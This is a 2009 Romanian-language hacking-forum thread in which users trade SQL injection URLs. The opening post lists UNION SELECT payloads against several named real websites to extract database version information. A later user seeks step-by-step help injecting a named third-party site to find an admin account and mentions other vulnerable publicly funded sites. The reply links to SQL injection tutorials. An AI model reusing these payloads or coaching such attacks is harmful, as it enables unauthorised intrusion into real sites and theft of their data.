paxnWo Posted March 5, 2009 Report Posted March 5, 2009 http://www.interesulpublic.ro/print.php?id=10077 and 1=0 union all select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18--http://www.atac-online.ro/print.php?id=11003 and 1=0 union all select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18--http://www.idea.ro/revista/edition/archive/print.php?id=481 and 1=0 union all select 1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15,16,17,18,19,20--http://www.pchardware.ro/Ro/Articole/print.php?id=128 and 1=0 union select all unhex(hex(@@version)),2--n-am testat load_file Quote
zbeng Posted March 5, 2009 Report Posted March 5, 2009 numai pe alea care am zis eu nu esti capabil sa gasestii Quote
mamaliga77 Posted March 15, 2009 Report Posted March 15, 2009 buna desi am urmarit diverse filmulete despre sqli nu reusesc nici cum sa le aplic.. cunostintele mele de info sunt la un nivel scazut de aceea va cer ajutorul. poate cineva sa imi explice pas cu pas pe un site (este siteul meu deci nu aduc nici un prejudiciu vreunei companii) sau pe alte siteuri asemanantoare. am incercat un sqli si primesc urmatorul rezultat: Microsoft VBScript runtime error '800a000d'Type mismatch: ''F:\WWWROOT\OLD_site_COM\nume\../sample.asp, line 24 sau Microsoft VBScript runtime error '800a000d'Type mismatch: '2 union all select f'F:\WWWROOT\OLD_site_COM\nume\../sample.asp, line 24 adresa pe care o tastez este : http://www.site.com/nume/sample.asp?p=2%20union%20all%20select%20from%20admin-- mai primesc o erooare de genul page cannot be found error 401 ...mersi anticipat Quote
redking Posted March 15, 2009 Report Posted March 15, 2009 pune ma si tu adresa completa....cine draq crezi ca te ajuta asa?....un sqli poate fi destul de diversificat...is multe detalii de care trebuie tinut cont Quote
mamaliga77 Posted March 15, 2009 Report Posted March 15, 2009 acel site la care primeam erooare era: http://www.hush-hush.com/1stFlash/sample.asp?p=2%20union%20all%20select%20from%20administrator-- vream sa gasesc un user valid mai am ceva siteuri care au vulnerabilitati.. siteuri mari si care au inghitit o groaza de bani de la buget nu vreau sa fac nici un deface ci pur si simplu vreau sa il public ca sa vada lumea cati bani se baga in unele firme de specialitate ("firme prietene") si a caror munca este de o zi poate doua .... pt sume imense de la buget mersi Quote
paxnWo Posted March 15, 2009 Author Report Posted March 15, 2009 ia aici http://www.b-1337.ro/tutoriale/basic-sqli/http://www.b-1337.ro/tutoriale/basic-sqli-2/http://www.b-1337.ro/tutoriale/basic-sqli-3/http://www.b-1337.ro/tutoriale/basic-sqli-4/ Quote
